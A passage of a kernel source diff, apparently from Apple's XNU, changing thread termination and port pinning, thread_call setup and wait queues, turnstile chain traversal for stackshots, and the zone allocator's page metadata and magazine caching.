+                                                          /* by footprint which uses a thread for each task being inspected. */
 };
 
 #define ith_state           saved.receive.state
@@ -740,8 +742,14 @@ extern void                     thread_read_deallocate(
 
 extern void                     thread_terminate_self(void);
 
+__options_decl(thread_terminate_options_t, uint32_t, {
+       TH_TERMINATE_OPTION_NONE,
+       TH_TERMINATE_OPTION_UNPIN
+});
+
 extern kern_return_t    thread_terminate_internal(
-       thread_t                thread);
+       thread_t                    thread,
+       thread_terminate_options_t  options);
 
 extern void                     thread_start(
        thread_t                        thread) __attribute__ ((noinline));
@@ -1067,10 +1075,18 @@ extern kern_return_t    thread_create_with_continuation(
        thread_t *new_thread,
        thread_continue_t continuation);
 
-extern kern_return_t thread_create_waiting(task_t               task,
-    thread_continue_t    continuation,
-    event_t              event,
-    thread_t             *new_thread);
+/* thread_create_waiting options */
+__options_decl(th_create_waiting_options_t, uint32_t, {
+       TH_CREATE_WAITING_OPTION_PINNED = 0x10,
+       TH_CREATE_WAITING_OPTION_IMMOVABLE = 0x20,
+});
+#define TH_CREATE_WAITING_OPTION_MASK          0x30
+
+extern kern_return_t thread_create_waiting(task_t    task,
+    thread_continue_t              continuation,
+    event_t                        event,
+    th_create_waiting_options_t    options,
+    thread_t                       *new_thread);
 
 extern kern_return_t    thread_create_workq_waiting(
        task_t                  task,
@@ -1381,6 +1397,7 @@ void thread_clear_eager_preempt(thread_t thread);
 void thread_set_honor_qlimit(thread_t thread);
 void thread_clear_honor_qlimit(thread_t thread);
 extern ipc_port_t convert_thread_to_port(thread_t);
+extern ipc_port_t convert_thread_to_port_pinned(thread_t);
 extern ipc_port_t convert_thread_inspect_to_port(thread_inspect_t);
 extern ipc_port_t convert_thread_read_to_port(thread_read_t);
 extern boolean_t is_vm_privileged(void);
@@ -1391,6 +1408,9 @@ extern void thread_iokit_tls_set(uint32_t index, void * data);
 extern void thread_port_with_flavor_notify(mach_msg_header_t *msg);
 extern int thread_self_region_page_shift(void);
 extern void thread_self_region_page_shift_set(int pgshift);
+extern kern_return_t thread_create_pinned(task_t task, thread_t *new_thread);
+extern kern_return_t thread_create_immovable(task_t task, thread_t *new_thread);
+extern kern_return_t thread_terminate_pinned(thread_t thread);
 #endif /* KERNEL_PRIVATE */
 
 __END_DECLS
index ccfb5eb3d41f5086fed455388fe6775956e322c6..679c11621df2425fdbbb344fbbc3aabd3c592911 100644 (file)
@@ -157,9 +157,11 @@ thread_start_in_assert_wait(
  */
 kern_return_t
 thread_terminate_internal(
-       thread_t                        thread)
+       thread_t                        thread,
+       thread_terminate_options_t      options)
 {
        kern_return_t           result = KERN_SUCCESS;
+       boolean_t               test_pin_bit = false;
 
        thread_mtx_lock(thread);
 
@@ -173,6 +175,8 @@ thread_terminate_internal(
                } else {
                        thread_start(thread);
                }
+               /* This bit can be reliably tested only if the thread is still active */
+               test_pin_bit = (options == TH_TERMINATE_OPTION_UNPIN) ? true : false;
        } else {
                result = KERN_TERMINATED;
        }
@@ -181,6 +185,13 @@ thread_terminate_internal(
                thread_affinity_terminate(thread);
        }
 
+       /*
+        * <rdar://problem/53562036> thread_terminate shouldn't be allowed on pthread
+        * Until thread_terminate is disallowed for pthreads, always unpin the pinned port
+        * when the thread is being terminated.
+        */
+       ipc_thread_port_unpin(thread->ith_self, test_pin_bit);
+
        thread_mtx_unlock(thread);
 
        if (thread != current_thread() && result == KERN_SUCCESS) {
@@ -206,7 +217,7 @@ thread_terminate(
                return KERN_FAILURE;
        }
 
-       kern_return_t result = thread_terminate_internal(thread);
+       kern_return_t result = thread_terminate_internal(thread, TH_TERMINATE_OPTION_NONE);
 
        /*
         * If a kernel thread is terminating itself, force handle the APC_AST here.
@@ -225,6 +236,20 @@ thread_terminate(
        return result;
 }
 
+kern_return_t
+thread_terminate_pinned(
+       thread_t                thread)
+{
+       if (thread == THREAD_NULL) {
+               return KERN_INVALID_ARGUMENT;
+       }
+
+       assert(thread->task != kernel_task);
+
+       kern_return_t result = thread_terminate_internal(thread, TH_TERMINATE_OPTION_UNPIN);
+       return result;
+}
+
 /*
  * Suspend execution of the specified thread.
  * This is a recursive-style suspension of the thread, a count of
index afe86a612c74f43a737953a1cf4bf65c420a27a8..6bcca37203eed56ffa6d2fa344194163881a0ca9 100644 (file)
@@ -56,8 +56,6 @@
 static ZONE_DECLARE(thread_call_zone, "thread_call",
     sizeof(thread_call_data_t), ZC_NOENCRYPT);
 
-static struct waitq daemon_waitq;
-
 typedef enum {
        TCF_ABSOLUTE    = 0,
        TCF_CONTINUOUS  = 1,
@@ -92,6 +90,8 @@ static struct thread_call_group {
        uint32_t                target_thread_count;
 
        thread_call_group_flags_t tcg_flags;
+
+       struct waitq            waiters_waitq;
 } thread_call_groups[THREAD_CALL_INDEX_MAX] = {
        [THREAD_CALL_INDEX_HIGH] = {
                .tcg_name               = "high",
@@ -458,6 +458,8 @@ thread_call_group_setup(thread_call_group_t group)
 
        timer_call_setup(&group->dealloc_timer, thread_call_dealloc_timer, group);
 
+       waitq_init(&group->waiters_waitq, SYNC_POLICY_DISABLE_IRQ);
+
        /* Reverse the wait order so we re-use the most recently parked thread from the pool */
        waitq_init(&group->idle_waitq, SYNC_POLICY_REVERSED | SYNC_POLICY_DISABLE_IRQ);
 }
@@ -530,23 +532,57 @@ thread_call_initialize(void)
 }
 
 void
-thread_call_setup(
+thread_call_setup_with_options(
        thread_call_t                   call,
        thread_call_func_t              func,
-       thread_call_param_t             param0)
+       thread_call_param_t             param0,
+       thread_call_priority_t          pri,
+       thread_call_options_t           options)
 {
        bzero(call, sizeof(*call));
 
        *call = (struct thread_call) {
                .tc_func = func,
                .tc_param0 = param0,
-
-               /*
-                * Thread calls default to the HIGH group
-                * unless otherwise specified.
-                */
-               .tc_index = THREAD_CALL_INDEX_HIGH,
        };
+
+       switch (pri) {
+       case THREAD_CALL_PRIORITY_HIGH:
+               call->tc_index = THREAD_CALL_INDEX_HIGH;
+               break;
+       case THREAD_CALL_PRIORITY_KERNEL:
+               call->tc_index = THREAD_CALL_INDEX_KERNEL;
+               break;
+       case THREAD_CALL_PRIORITY_USER:
+               call->tc_index = THREAD_CALL_INDEX_USER;
+               break;
+       case THREAD_CALL_PRIORITY_LOW:
+               call->tc_index = THREAD_CALL_INDEX_LOW;
+               break;
+       case THREAD_CALL_PRIORITY_KERNEL_HIGH:
+               call->tc_index = THREAD_CALL_INDEX_KERNEL_HIGH;
+               break;
+       default:
+               panic("Invalid thread call pri value: %d", pri);
+               break;
+       }
+
+       if (options & THREAD_CALL_OPTIONS_ONCE) {
+               call->tc_flags |= THREAD_CALL_ONCE;
+       }
+       if (options & THREAD_CALL_OPTIONS_SIGNAL) {
+               call->tc_flags |= THREAD_CALL_SIGNAL | THREAD_CALL_ONCE;
+       }
+}
+
+void
+thread_call_setup(
+       thread_call_t                   call,
+       thread_call_func_t              func,
+       thread_call_param_t             param0)
+{
+       thread_call_setup_with_options(call, func, param0,
+           THREAD_CALL_PRIORITY_HIGH, 0);
 }
 
 static void
@@ -592,8 +628,8 @@ _internal_call_allocate(thread_call_func_t func, thread_call_param_t param0)
        thread_call_internal_queue_count--;
 
        thread_call_setup(call, func, param0);
-       call->tc_refs = 0;
-       call->tc_flags = 0; /* THREAD_CALL_ALLOC not set, do not free back to zone */
+       /* THREAD_CALL_ALLOC not set, do not free back to zone */
+       assert((call->tc_flags & THREAD_CALL_ALLOC) == 0);
        enable_ints_and_unlock(group, s);
 
        return call;
@@ -953,35 +989,11 @@ thread_call_allocate_with_options(
        thread_call_priority_t          pri,
        thread_call_options_t           options)
 {
-       thread_call_t call = thread_call_allocate(func, param0);
-
-       switch (pri) {
-       case THREAD_CALL_PRIORITY_HIGH:
-               call->tc_index = THREAD_CALL_INDEX_HIGH;
-               break;
-       case THREAD_CALL_PRIORITY_KERNEL:
-               call->tc_index = THREAD_CALL_INDEX_KERNEL;
-               break;
-       case THREAD_CALL_PRIORITY_USER:
-               call->tc_index = THREAD_CALL_INDEX_USER;
-               break;
-       case THREAD_CALL_PRIORITY_LOW:
-               call->tc_index = THREAD_CALL_INDEX_LOW;
-               break;
-       case THREAD_CALL_PRIORITY_KERNEL_HIGH:
-               call->tc_index = THREAD_CALL_INDEX_KERNEL_HIGH;
-               break;
-       default:
-               panic("Invalid thread call pri value: %d", pri);
-               break;
-       }
+       thread_call_t call = zalloc(thread_call_zone);
 
-       if (options & THREAD_CALL_OPTIONS_ONCE) {
-               call->tc_flags |= THREAD_CALL_ONCE;
-       }
-       if (options & THREAD_CALL_OPTIONS_SIGNAL) {
-               call->tc_flags |= THREAD_CALL_SIGNAL | THREAD_CALL_ONCE;
-       }
+       thread_call_setup_with_options(call, func, param0, pri, options);
+       call->tc_refs = 1;
+       call->tc_flags |= THREAD_CALL_ALLOC;
 
        return call;
 }
@@ -1039,13 +1051,8 @@ thread_call_allocate(
        thread_call_func_t              func,
        thread_call_param_t             param0)
 {
-       thread_call_t   call = zalloc(thread_call_zone);
-
-       thread_call_setup(call, func, param0);
-       call->tc_refs = 1;
-       call->tc_flags = THREAD_CALL_ALLOC;
-
-       return call;
+       return thread_call_allocate_with_options(func, param0,
+                  THREAD_CALL_PRIORITY_HIGH, 0);
 }
 
 /*
@@ -1422,7 +1429,7 @@ thread_call_wake(
                if (group->idle_count) {
                        __assert_only kern_return_t kr;
 
-                       kr = waitq_wakeup64_one(&group->idle_waitq, NO_EVENT64,
+                       kr = waitq_wakeup64_one(&group->idle_waitq, CAST_EVENT64_T(group),
                            THREAD_AWAKENED, WAITQ_ALL_PRIORITIES);
                        assert(kr == KERN_SUCCESS);
 
@@ -1438,7 +1445,7 @@ thread_call_wake(
                        if (thread_call_group_should_add_thread(group) &&
                            os_atomic_cmpxchg(&thread_call_daemon_awake,
                            false, true, relaxed)) {
-                               waitq_wakeup64_all(&daemon_waitq, NO_EVENT64,
+                               waitq_wakeup64_all(&daemon_waitq, CAST_EVENT64_T(&thread_call_daemon_awake),
                                    THREAD_AWAKENED, WAITQ_ALL_PRIORITIES);
                        }
                }
@@ -1498,10 +1505,11 @@ thread_call_finish(thread_call_t call, thread_call_group_t group, spl_t *s)
 
        bool repend = false;
        bool signal = call->tc_flags & THREAD_CALL_SIGNAL;
+       bool alloc = call->tc_flags & THREAD_CALL_ALLOC;
 
        call->tc_finish_count++;
 
-       if (!signal) {
+       if (!signal && alloc) {
                /* The thread call thread owns a ref until the call is finished */
                if (call->tc_refs <= 0) {
                        panic("thread_call_finish: detected over-released thread call: %p", call);
@@ -1512,7 +1520,8 @@ thread_call_finish(thread_call_t call, thread_call_group_t group, spl_t *s)
        thread_call_flags_t old_flags = call->tc_flags;
        call->tc_flags &= ~(THREAD_CALL_RESCHEDULE | THREAD_CALL_RUNNING | THREAD_CALL_WAIT);
 
-       if (call->tc_refs != 0 && (old_flags & THREAD_CALL_RESCHEDULE) != 0) {
+       if ((!alloc || call->tc_refs != 0) &&
+           (old_flags & THREAD_CALL_RESCHEDULE) != 0) {
                assert(old_flags & THREAD_CALL_ONCE);
                thread_call_flavor_t flavor = thread_call_get_flavor(call);
 
@@ -1541,7 +1550,7 @@ thread_call_finish(thread_call_t call, thread_call_group_t group, spl_t *s)
                }
        }
 
-       if (!signal && (call->tc_refs == 0)) {
+       if (!signal && alloc && call->tc_refs == 0) {
                if ((old_flags & THREAD_CALL_WAIT) != 0) {
                        panic("Someone waiting on a thread call that is scheduled for free: %p\n", call->tc_func);
                }
@@ -1557,12 +1566,19 @@ thread_call_finish(thread_call_t call, thread_call_group_t group, spl_t *s)
 
        if ((old_flags & THREAD_CALL_WAIT) != 0) {
                /*
-                * Dropping lock here because the sched call for the
-                * high-pri group can take the big lock from under
-                * a thread lock.
+                * This may wake up a thread with a registered sched_call.
+                * That call might need the group lock, so we drop the lock
+                * to avoid deadlocking.
+                *
+                * We also must use a separate waitq from the idle waitq, as
+                * this path goes waitq lock->thread lock->group lock, but
+                * the idle wait goes group lock->waitq_lock->thread_lock.
                 */
                thread_call_unlock(group);
-               thread_wakeup((event_t)call);
+
+               waitq_wakeup64_all(&group->waiters_waitq, CAST_EVENT64_T(call),
+                   THREAD_AWAKENED, WAITQ_ALL_PRIORITIES);
+
                thread_call_lock_spin(group);
                /* THREAD_CALL_SIGNAL call may have been freed */
        }
@@ -1668,9 +1684,20 @@ thread_call_thread(
                 */
                bool needs_finish = false;
                if (call->tc_flags & THREAD_CALL_ALLOC) {
+                       call->tc_refs++;        /* Delay free until we're done */
+               }
+               if (call->tc_flags & (THREAD_CALL_ALLOC | THREAD_CALL_ONCE)) {
+                       /*
+                        * If THREAD_CALL_ONCE is used, and the timer wasn't
+                        * THREAD_CALL_ALLOC, then clients swear they will use
+                        * thread_call_cancel_wait() before destroying
+                        * the thread call.
+                        *
+                        * Else, the storage for the thread call might have
+                        * disappeared when thread_call_invoke() ran.
+                        */
                        needs_finish = true;
                        call->tc_flags |= THREAD_CALL_RUNNING;
-                       call->tc_refs++;        /* Delay free until we're done */
                }
 
                thc_state.thc_call = call;
@@ -1699,7 +1726,7 @@ thread_call_thread(
                s = disable_ints_and_lock(group);
 
                if (needs_finish) {
-                       /* Release refcount, may free */
+                       /* Release refcount, may free, may temporarily drop lock */
                        thread_call_finish(call, group, &s);
                }
        }
@@ -1740,7 +1767,7 @@ thread_call_thread(
                }
 
                /* Wait for more work (or termination) */
-               wres = waitq_assert_wait64(&group->idle_waitq, NO_EVENT64, THREAD_INTERRUPTIBLE, 0);
+               wres = waitq_assert_wait64(&group->idle_waitq, CAST_EVENT64_T(group), THREAD_INTERRUPTIBLE, 0);
                if (wres != THREAD_WAITING) {
                        panic("kcall worker unable to assert wait?");
                }
@@ -1752,7 +1779,7 @@ thread_call_thread(
                if (group->idle_count < group->target_thread_count) {
                        group->idle_count++;
 
-                       waitq_assert_wait64(&group->idle_waitq, NO_EVENT64, THREAD_UNINT, 0); /* Interrupted means to exit */
+                       waitq_assert_wait64(&group->idle_waitq, CAST_EVENT64_T(group), THREAD_UNINT, 0); /* Interrupted means to exit */
 
                        enable_ints_and_unlock(group, s);
 
@@ -1815,7 +1842,7 @@ thread_call_daemon_continue(__unused void *arg)
                }
        } while (os_atomic_load(&thread_call_daemon_awake, relaxed));
 
-       waitq_assert_wait64(&daemon_waitq, NO_EVENT64, THREAD_UNINT, 0);
+       waitq_assert_wait64(&daemon_waitq, CAST_EVENT64_T(&thread_call_daemon_awake), THREAD_UNINT, 0);
 
        if (os_atomic_load(&thread_call_daemon_awake, relaxed)) {
                clear_wait(current_thread(), THREAD_AWAKENED);
@@ -2025,7 +2052,7 @@ thread_call_dealloc_timer(
                if (now > group->idle_timestamp + thread_call_dealloc_interval_abs) {
                        terminated = true;
                        group->idle_count--;
-                       res = waitq_wakeup64_one(&group->idle_waitq, NO_EVENT64,
+                       res = waitq_wakeup64_one(&group->idle_waitq, CAST_EVENT64_T(group),
                            THREAD_INTERRUPTED, WAITQ_ALL_PRIORITIES);
                        if (res != KERN_SUCCESS) {
                                panic("Unable to wake up idle thread for termination?");
@@ -2066,6 +2093,11 @@ thread_call_dealloc_timer(
  *
  * Takes the thread call lock locked, returns unlocked
  *      This lets us avoid a spurious take/drop after waking up from thread_block
+ *
+ * This thread could be a thread call thread itself, blocking and therefore making a
+ * sched_call upcall into the thread call subsystem, needing the group lock.
+ * However, we're saved from deadlock because the 'block' upcall is made in
+ * thread_block, not in assert_wait.
  */
 static bool
 thread_call_wait_once_locked(thread_call_t call, spl_t s)
@@ -2083,7 +2115,7 @@ thread_call_wait_once_locked(thread_call_t call, spl_t s)
        /* call is running, so we have to wait for it */
        call->tc_flags |= THREAD_CALL_WAIT;
 
-       wait_result_t res = assert_wait(call, THREAD_UNINT);
+       wait_result_t res = waitq_assert_wait64(&group->waiters_waitq, CAST_EVENT64_T(call), THREAD_UNINT, 0);
        if (res != THREAD_WAITING) {
                panic("Unable to assert wait: %d", res);
        }
@@ -2162,7 +2194,9 @@ thread_call_wait_locked(thread_call_t call, spl_t s)
        while (call->tc_finish_count < submit_count) {
                call->tc_flags |= THREAD_CALL_WAIT;
 
-               wait_result_t res = assert_wait(call, THREAD_UNINT);
+               wait_result_t res = waitq_assert_wait64(&group->waiters_waitq,
+                   CAST_EVENT64_T(call), THREAD_UNINT, 0);
+
                if (res != THREAD_WAITING) {
                        panic("Unable to assert wait: %d", res);
                }
index 254ef28b8afc3548f284c0602cb10c5a6bbca91f..1e0f2fb96303c0d0421d29125a9fdd116257b342 100644 (file)
@@ -400,6 +400,13 @@ extern void             thread_call_setup(
        thread_call_func_t              func,
        thread_call_param_t             param0);
 
+extern void             thread_call_setup_with_options(
+       thread_call_t                   call,
+       thread_call_func_t              func,
+       thread_call_param_t             param0,
+       thread_call_priority_t          pri,
+       thread_call_options_t           options);
+
 extern void             thread_call_delayed_timer_rescan_all(void);
 extern uint64_t         thread_call_get_armed_deadline(thread_call_t call);
 
index 14792548567bc99b1fd25870c27dec07d94e77c6..ca8228f6d88402d1389c0a281cf1f8742cc78c44 100644 (file)
@@ -812,8 +812,8 @@ thread_group_vm_add(void)
        thread_set_thread_group(current_thread(), thread_group_find_by_id_and_retain(THREAD_GROUP_VM), false);
 }
 
-uint64_t
-kdp_thread_group_get_flags(struct thread_group *tg)
+uint32_t
+thread_group_get_flags(struct thread_group *tg)
 {
        return tg->tg_flags;
 }
index f18259bd788e84b70736e1ac1af508dbadfaea64..c7e78d05e219a893c74382dafdb4497e84a1b848 100644 (file)
@@ -91,7 +91,7 @@ cluster_type_t  thread_group_recommendation(struct thread_group *tg);
 
 typedef         void (*thread_group_iterate_fn_t)(void*, int, struct thread_group *);
 kern_return_t   thread_group_iterate_stackshot(thread_group_iterate_fn_t callout, void *arg);
-uint64_t kdp_thread_group_get_flags(struct thread_group *);
+uint32_t        thread_group_get_flags(struct thread_group *);
 boolean_t       thread_group_smp_restricted(struct thread_group *tg);
 void            thread_group_update_recommendation(struct thread_group *tg, cluster_type_t new_recommendation);
 
index baa08bf2735f5a8fd07db391edda6748232de9a6..8d98e3989c8fa228c3a8a98def0f17ed7b89ac97 100644 (file)
@@ -3188,59 +3188,72 @@ turnstile_stats_update(
 static uint64_t
 kdp_turnstile_traverse_inheritor_chain(struct turnstile *ts, uint64_t *flags, uint8_t *hops)
 {
+       uint8_t unknown_hops;
+
        if (waitq_held(&ts->ts_waitq)) {
                *flags |= STACKSHOT_TURNSTILE_STATUS_LOCKED_WAITQ;
                return 0;
        }
 
        *hops = *hops + 1;
+       unknown_hops = *hops;
+
+       /*
+        * If a turnstile is inheriting our priority, recurse.  If we get back *exactly* UNKNOWN,
+        * continue on, since we may be able to give a more specific answer.  To
+        * give an accurate hops count, we reset *hops, saving the recursive value in
+        * unknown_hops to use if we can't give a better answer.
+        */
+       if (ts->ts_inheritor_flags & TURNSTILE_INHERITOR_TURNSTILE) {
+               uint8_t pre_hops = *hops;
+               uint64_t ret = kdp_turnstile_traverse_inheritor_chain(ts->ts_inheritor, flags, hops);
+               /*
+                * Note that while flags is usually |=ed, we're checking with != here to
+                * make sure we only replace *exactly* UNKNOWN
+                */
+               if (ret != 0 || *flags != STACKSHOT_TURNSTILE_STATUS_UNKNOWN) {
+                       return ret;
+               }
+               /* restore original hops value, saving the new one if we fall through to unknown */
+               unknown_hops = *hops;
+               *hops = pre_hops;
+               *flags = 0;
+       }
+
+       if (ts->ts_inheritor_flags & TURNSTILE_INHERITOR_THREAD) {
+               *flags |= STACKSHOT_TURNSTILE_STATUS_THREAD;
+               return (uint64_t) thread_tid(ts->ts_inheritor);
+       }
+
+       if (ts->ts_inheritor_flags & TURNSTILE_INHERITOR_WORKQ) {
+               *flags |= STACKSHOT_TURNSTILE_STATUS_WORKQUEUE;
+               return VM_KERNEL_UNSLIDE_OR_PERM(ts->ts_inheritor);
+       }
 
        /*
         * If we found a send turnstile, try to get the task that the turnstile's
         * port is in the ipc space of
         */
        if (turnstile_is_send_turnstile(ts)) {
-               task_t dest_task = TASK_NULL;
                ipc_port_t port = (ipc_port_t)ts->ts_proprietor;
 
                if (port && ip_active(port)) {
                        if (ip_lock_held_kdp(port)) {
                                *flags |= STACKSHOT_TURNSTILE_STATUS_HELD_IPLOCK;
-
                                return 0;
-                       } else {
-                               if (port->ip_receiver_name != 0) {
-                                       if (port->ip_receiver) {
-                                               ipc_space_t space = (ipc_space_t) port->ip_receiver;
-
-                                               dest_task = space->is_task;
-                                       } else {
-                                               return 0;
-                                       }
-                               }
                        }
-               }
+                       if (port->ip_receiver_name != 0 && port->ip_receiver) {
+                               ipc_space_t space = (ipc_space_t) port->ip_receiver;
+                               task_t dest_task = space->is_task;
 
-               if (dest_task != TASK_NULL) {
-                       *flags |= STACKSHOT_TURNSTILE_STATUS_BLOCKED_ON_TASK;
-                       return pid_from_task(dest_task);
+                               if (dest_task != TASK_NULL) {
+                                       *flags |= STACKSHOT_TURNSTILE_STATUS_BLOCKED_ON_TASK;
+                                       return pid_from_task(dest_task);
+                               }
+                       }
                }
        }
 
-       if (ts->ts_inheritor_flags & TURNSTILE_INHERITOR_TURNSTILE) {
-               return kdp_turnstile_traverse_inheritor_chain(ts->ts_inheritor, flags, hops);
-       }
-
-       if (ts->ts_inheritor_flags & TURNSTILE_INHERITOR_THREAD) {
-               *flags |= STACKSHOT_TURNSTILE_STATUS_THREAD;
-               return (uint64_t) thread_tid(ts->ts_inheritor);
-       }
-
-       if (ts->ts_inheritor_flags & TURNSTILE_INHERITOR_WORKQ) {
-               *flags |= STACKSHOT_TURNSTILE_STATUS_WORKQUEUE;
-               return VM_KERNEL_UNSLIDE_OR_PERM(ts->ts_inheritor);
-       }
-
        if (turnstile_is_receive_turnstile(ts)) {
                ipc_port_t port = (ipc_port_t)ts->ts_proprietor;
                if (port && ip_active(port)) {
@@ -3260,6 +3273,7 @@ kdp_turnstile_traverse_inheritor_chain(struct turnstile *ts, uint64_t *flags, ui
                }
        }
 
+       *hops = unknown_hops;
        *flags |= STACKSHOT_TURNSTILE_STATUS_UNKNOWN;
        return 0;
 }
index 0329eeea676839bbbac9cdc1648c2f2915e258ec..07e60a0c1aea73b30ca779f6cf21baf1626269f0 100644 (file)
@@ -58,8 +58,8 @@
  * most Mach exceptions.
  */
 
-static const void                      *ux_handler_kobject    = NULL;
-SECURITY_READ_ONLY_LATE(ipc_port_t)     ux_handler_port       = IP_NULL;
+static SECURITY_READ_ONLY_LATE(const void *)    ux_handler_kobject    = NULL;
+SECURITY_READ_ONLY_LATE(ipc_port_t)             ux_handler_port       = IP_NULL;
 
 /*
  * init is called early in Mach initialization
index 1ef23d043ac16388bf8d1ec075437f3f2b5fc3ad..9d33499119e11ea6b5fd45b16e7b2f95be0cb09b 100644 (file)
@@ -64,6 +64,7 @@
  */
 
 #define ZALLOC_ALLOW_DEPRECATED 1
+#if !ZALLOC_TEST
 #include <mach/mach_types.h>
 #include <mach/vm_param.h>
 #include <mach/kern_return.h>
@@ -94,6 +95,7 @@
 #include <vm/vm_map.h>
 #include <vm/vm_kern.h>
 #include <vm/vm_page.h>
+#include <vm/vm_pageout.h>
 #include <vm/vm_compressor.h> /* C_SLOT_PACKED_PTR* */
 
 #include <pexpert/pexpert.h>
 #include <san/kasan.h>
 
 #if KASAN_ZALLOC
+/*
+ * Set to 0 to debug poisoning and ZC_ZFREE_CLEARMEM validation under kasan.
+ * Otherwise they are double-duty with what kasan already does.
+ */
+#define ZALLOC_ENABLE_POISONING 0
 #define ZONE_ENABLE_LOGGING 0
 #elif DEBUG || DEVELOPMENT
+#define ZALLOC_ENABLE_POISONING 1
 #define ZONE_ENABLE_LOGGING 1
 #else
+#define ZALLOC_ENABLE_POISONING 1
 #define ZONE_ENABLE_LOGGING 0
 #endif
 
+#if __LP64__
+#define ZALLOC_EARLY_GAPS 1
+#else
+#define ZALLOC_EARLY_GAPS 0
+#endif
+
+#if DEBUG
+#define z_debug_assert(expr)  assert(expr)
+#else
+#define z_debug_assert(expr)  (void)(expr)
+#endif
+
 extern void vm_pageout_garbage_collect(int collect);
 
 /* Returns pid of the task with the largest number of VM map entries.  */
@@ -131,120 +152,277 @@ extern boolean_t memorystatus_kill_on_zone_map_exhaustion(pid_t pid);
 
 extern zone_t vm_map_entry_zone;
 extern zone_t vm_object_zone;
-extern vm_offset_t kmapoff_kaddr;
-extern unsigned int kmapoff_pgcnt;
-extern unsigned int stack_total;
-extern unsigned long long stack_allocs;
-
-/*
- * The max # of elements in a chunk should fit into
- * zone_page_metadata.free_count (uint16_t).
- *
- * Update this if the type of free_count changes.
- */
-#define ZONE_CHUNK_MAXELEMENTS  (UINT16_MAX)
-
-#define ZONE_PAGECOUNT_BITS     14
 
-/* Zone elements must fit both a next pointer and a backup pointer */
-#define ZONE_MIN_ELEM_SIZE      (2 * sizeof(vm_offset_t))
+#define ZONE_MIN_ELEM_SIZE      sizeof(uint64_t)
 #define ZONE_MAX_ALLOC_SIZE     (32 * 1024)
 
-/* per-cpu zones are special because of counters */
-#define ZONE_MIN_PCPU_ELEM_SIZE (1 * sizeof(vm_offset_t))
-
-struct zone_map_range {
-       vm_offset_t min_address;
-       vm_offset_t max_address;
-};
-
 struct zone_page_metadata {
        /* The index of the zone this metadata page belongs to */
-       zone_id_t       zm_index;
-
-       /*
-        * zm_secondary_page == 0: number of pages in this run
-        * zm_secondary_page == 1: offset to the chunk start
-        */
-       uint16_t        zm_page_count : ZONE_PAGECOUNT_BITS;
+       zone_id_t       zm_index : 11;
 
-       /* Whether this page is part of a chunk run */
-       uint16_t        zm_percpu : 1;
-       uint16_t        zm_secondary_page : 1;
+       /* Whether `zm_bitmap` is an inline bitmap or a packed bitmap reference */
+       uint16_t        zm_inline_bitmap : 1;
 
        /*
-        * The start of the freelist can be maintained as a 16-bit
-        * offset instead of a pointer because the free elements would
-        * be at max ZONE_MAX_ALLOC_SIZE bytes away from the start
-        * of the allocation chunk.
+        * Zones allocate in "chunks" of zone_t::z_chunk_pages consecutive
+        * pages, or zpercpu_count() pages if the zone is percpu.
         *
-        * Offset from start of the allocation chunk to free element
-        * list head.
-        */
-       uint16_t        zm_freelist_offs;
-
-       /*
-        * zm_secondary_page == 0: number of allocated elements in the chunk
-        * zm_secondary_page == 1: unused
+        * The first page of it has its metadata set with:
+        * - 0 if none of the pages are currently wired
+        * - the number of wired pages in the chunk (not scaled for percpu).
         *
-        * PAGE_METADATA_EMPTY_FREELIST indicates an empty freelist
+        * Other pages in the chunk have their zm_chunk_len set to
+        * ZM_SECONDARY_PAGE or ZM_SECONDARY_PCPU_PAGE depending on whether
+        * the zone is percpu or not. For those, zm_page_index holds the
+        * index of that page in the run.
         */
-       uint16_t        zm_alloc_count;
-#define PAGE_METADATA_EMPTY_FREELIST  UINT16_MAX
+       uint16_t        zm_chunk_len : 4;
+#define ZM_CHUNK_LEN_MAX        0x8
+#define ZM_SECONDARY_PAGE       0xe
+#define ZM_SECONDARY_PCPU_PAGE  0xf
+
+       union {
+#define ZM_ALLOC_SIZE_LOCK      1u
+               uint16_t zm_alloc_size; /* first page only */
+               uint16_t zm_page_index; /* secondary pages only */
+       };
+       union {
+               uint32_t zm_bitmap;     /* most zones */
+               uint32_t zm_bump;       /* permanent zones */
+       };
 
        zone_pva_t      zm_page_next;
        zone_pva_t      zm_page_prev;
-
-       /*
-        * This is only for the sake of debuggers
-        */
-#define ZONE_FOREIGN_COOKIE           0x123456789abcdef
-       uint64_t        zm_foreign_cookie[];
 };
+static_assert(sizeof(struct zone_page_metadata) == 16, "validate packing");
 
+__enum_closed_decl(zone_addr_kind_t, bool, {
+       ZONE_ADDR_FOREIGN,
+       ZONE_ADDR_NATIVE,
+});
+#define ZONE_ADDR_KIND_COUNT 2
 
-/* Align elements that use the zone page list to 32 byte boundaries. */
-#define ZONE_PAGE_FIRST_OFFSET(kind)  ((kind) == ZONE_ADDR_NATIVE ? 0 : 32)
+/*!
+ * @typedef zone_element_t
+ *
+ * @brief
+ * Type that represents a "resolved" zone element.
+ *
+ * @description
+ * This type encodes an element pointer as a tuple of:
+ * { chunk base, element index, element protection }.
+ *
+ * The chunk base is extracted with @c trunc_page()
+ * as it is always page aligned, and occupies the bits above @c PAGE_SHIFT.
+ *
+ * The low two bits encode the protection mode (see @c zprot_mode_t).
+ *
+ * The other bits encode the element index in the chunk rather than its address.
+ */
+typedef struct zone_element {
+       vm_offset_t                 ze_value;
+} zone_element_t;
 
-static_assert(sizeof(struct zone_page_metadata) == 16, "validate packing");
+/*!
+ * @typedef zone_magazine_t
+ *
+ * @brief
+ * Magazine of cached allocations.
+ *
+ * @field zm_cur        how many elements this magazine holds (unused while loaded).
+ * @field zm_link       linkage used by magazine depots.
+ * @field zm_elems      an array of @c zc_mag_size() elements.
+ */
+typedef struct zone_magazine {
+       uint16_t                    zm_cur;
+       STAILQ_ENTRY(zone_magazine) zm_link;
+       zone_element_t              zm_elems[0];
+} *zone_magazine_t;
+
+/*!
+ * @typedef zone_cache_t
+ *
+ * @brief
+ * Magazine of cached allocations.
+ *
+ * @discussion
+ * Below is a diagram of the caching system. This design is inspired by the
+ * paper "Magazines and Vmem: Extending the Slab Allocator to Many CPUs and
+ * Arbitrary Resources" by Jeff Bonwick and Jonathan Adams and the FreeBSD UMA
+ * zone allocator (itself derived from this seminal work).
+ *
+ * It is divided into 3 layers:
+ * - the per-cpu layer,
+ * - the recirculation depot layer,
+ * - the Zone Allocator.
+ *
+ * The per-cpu and recirculation depot layer use magazines (@c zone_magazine_t),
+ * which are stacks of up to @c zc_mag_size() elements.
+ *
+ * <h2>CPU layer</h2>
+ *
+ * The CPU layer (@c zone_cache_t) looks like this:
+ *
